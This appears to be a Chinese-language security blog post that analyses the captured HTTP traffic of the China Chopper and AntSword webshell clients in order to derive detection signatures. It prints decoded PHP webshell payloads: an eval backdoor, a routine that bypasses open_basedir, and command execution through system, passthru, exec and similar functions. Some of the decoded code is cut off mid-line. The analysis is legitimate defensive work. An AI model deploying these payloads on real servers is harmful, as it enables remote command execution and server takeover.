前言:webshell是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。
菜刀作为一个老牌webshell连接工具,在以前已经大放光彩。但相对于现在来说,功能比较单一,且没有提供插件,也不支持扩展,目前也没有继续更新了。还有一点就是菜刀只能处理eval函数。但现在用于流量分析是一个很好的案例。
下面以php为样例来进行分析。
由于菜刀本身不带代理功能,我们可以借助第三方流量探测工具查看,这里我们使用wireshark。
# 执行whoami命令 中国菜刀的数据包
1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHB1dFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
简单看了一下,菜刀的数据加密只有url编码和base64编码,很容易解码。
#解密后
1=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";$r="{$p} {$c}";@system($r." 2>&1");;echo("|<-");die();&z2=cd /d "C:\put\"&whoami&echo [S]&cd&echo [E]
# 分段查看分析
1=@eval(base64_decode($_POST[z0])); # 内嵌一个eval函数,参数名为z0
&z0=@ini_set("display_errors","0"); # 设置环境变量
@set_time_limit(0); # 设置环境变量
@set_magic_quotes_runtime(0); # 设置环境变量
echo("->|");; # 打印字符
$p=base64_decode($_POST["z1"]); # POST传参z1
$s=base64_decode($_POST["z2"]); # POST传参z2
$d=dirname($_SERVER["SCRIPT_FILENAME"]); # 将当前目录传递给$d
$c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";
$r="{$p} {$c}";
@system($r." 2>&1");; # 将解密后的参数传入system函数进行执行
echo("|<-");
die();
&z1=Y21k; #cmd的base64编码
&z2=cd /d "C:\put\"&whoami&echo [S]&cd&echo [E] # 执行命令
主要利用方式:eval函数
参数名:z1、z2、z3。 z0用于设置环境变量、z1为密码、z2为执行的命令。
加密方式: base64加密、url编码
User-Agent: 百度的或者是火狐的。
其他:下面几个环境变量也可以作为流量特征来进行研判分析。
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
前言:中国蚁剑的核心代码模板均改自伟大的中国菜刀,所以总体特征跟菜刀很像,且蚁剑目前有人更新,有插件,能处理几种函数,相比于菜刀来说,功能性更高,拓展性更强。本次测试的版本为v2.1.15
蚁剑自带代理功能,我们可以直接将流量代理到burp上进行分析。
配置完代理后,我们点击测试连接,就可以抓到包了。
我们将这个测试连接的流量拿出来分析
# 原始流量
pass=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.a76c2547%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22eb19%22.%22962d%22%3Becho%20%40asenc(%24output)%3Becho%20%22a0e481%22.%22b16150%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
# url解码后
# 这两行试图禁止错误信息的显示,并将脚本的执行时间限制设置为无限。
pass=@ini_set("display_errors","0");
@set_time_limit(0);
# 这一行获取 PHP 配置指令 open_basedir 的值,该指令限制了可以从中读取文件的目录。
$opdir=@ini_get("open_basedir");
# 这一段代码尝试在当前目录和临时目录中创建隐藏目录,然后尝试改变目录,绕过 open_basedir 限制。
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {if(!@is_writable($item)){continue;};
$tmdir=$item."/.a76c2547";
@mkdir($tmdir);
if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir","..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for($i=0;$igetMessage();};
asoutput();
die();
响应包:
根据响应包,我们可以看出请求包里执行了三条系统命令(利用php系统函数)
1. pwd -> dirname($_SERVER["SCRIPT_FILENAME"])
2. uname -a -> php_uname()
3. whoami -> get_current_user()
说明蚁剑测试是否连接成功,是通过检测响应包中是否存在对应的字段。当然这里只做了检测的流量分析,接下来我们看看其他的命令执行的流量。
# 执行id命令。
c99e8d28cab9b9=dML2Jpbi9zaA%3D%3D&m1b60a407d94ab=1i&m6aca223dba11a=tWY2QgIi92YXIvd3d3L2h0bWwiO3dob2FtaTtlY2hvIDY2NTBmODtwd2Q7ZWNobyBjMDgwNDdmZTVm&pass=
@ini_set("display_errors","0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir); # /;|:/
@array_push($oparr,$ocwd,sys_get_temp_dir()); # 创建临时目录
foreach($oparr as $item) {if(!@is_writable($item)){continue;};
$tmdir=$item."/.1db58ee414";
@mkdir($tmdir);
if(!@file_exists($tmdir)){continue;}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir","..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for($i=0;$i$tmp 2>&1");if (fe('error_log'))
{error_log("a", 1);}
else {mail("[email protected]", "", "", "-bv");}}
else {return False;}$output = @file_get_contents($tmp);
@unlink($tmp);if ($output != "")
{print($output);return True;}}return False;};
function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')){@system($c,$ret);} # 条件满足,执行system函数
elseif(fe('passthru')){@passthru($c,$ret);} # 否则执行 passthru函数
elseif(fe('shell_exec')){print(@shell_exec($c));} # 否则 shell_exec函数
elseif(fe('exec')){@exec($c,$o,$ret); #否则执行exec函数
print(join("",$o));}
elseif(fe('popen')){$fp=@popen($c,'r');
while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}
elseif(fe('proc_open')){
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])){print(@fgets($io[1],2048));}
while(!@feof($io[2])){print(@fgets($io[2],2048));}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);}
elseif(fe('antsystem')){@antsystem($c);}
elseif(runshellshock($d, $c)) {return $ret;}
elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');
$e=$w->exec($c);$so=$e->StdOut();
$ret.=$so->ReadAll();
$se=$e->StdErr();
$ret.=$se->ReadAll();
print($ret);}
else{$ret = 127;}return $ret;};
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";;}
catch(Exception $e)
{echo "ERROR://".$e->getMessage();};
asoutput();
die();
简单梳理一下,大概就是开始定义POST的参数,其中
c99e8d28cab9b9=dML2Jpbi9zaA%3D%3D
m1b60a407d94ab=1i
m6aca223dba11a=tWY2QgIi92YXIvd3d3L2h0bWwiO3dob2FtaTtlY2hvIDY2NTBmODtwd2Q7ZWNobyBjMDgwNDdmZTVm
参数名字应该是随机生成的,最后会将这几个值代入到最后的代码里面执行。
这里我们主要看这几条代码:
# 这几条代码会将前面的参数的值进行一个解码操作
$p=base64_decode(substr($_POST["p5dd8c3542537a"],2)); # 调用/bin/bash
$s=base64_decode(substr($_POST["i250ce4b58060b"],2)); # 用于后面判断测试
$envstr=@base64_decode(substr($_POST["d6fd35bd99a9ec"],2)); # 要执行的命令参数 cd "/var/www/html";id;echo 6650f8;pwd;echo c08047fe5f
最后参数会经过几轮倒转最后被调用到以下几个函数进行测试,接下来看这几行代码:
if(fe('system')){@system($c,$ret);} # 条件满足,执行system函数
elseif(fe('passthru')){@passthru($c,$ret);} # 否则执行 passthru函数
elseif(fe('shell_exec')){print(@shell_exec($c));} # 否则 shell_exec函数
elseif(fe('exec')){@exec($c,$o,$ret); #否则执行exec函数
至此,我们总结一下蚁剑的流量特征:
@ini_set("display_errors","0");
@set_time_limit(0);
蚁剑目前的流量分析,都是没有使用编码器和解码器的,而蚁剑相比于菜刀的优势就在于这个编码器和解码器,能够更方便的隐藏自己,后面有想进一步了解的小伙伴可以点个关注哟。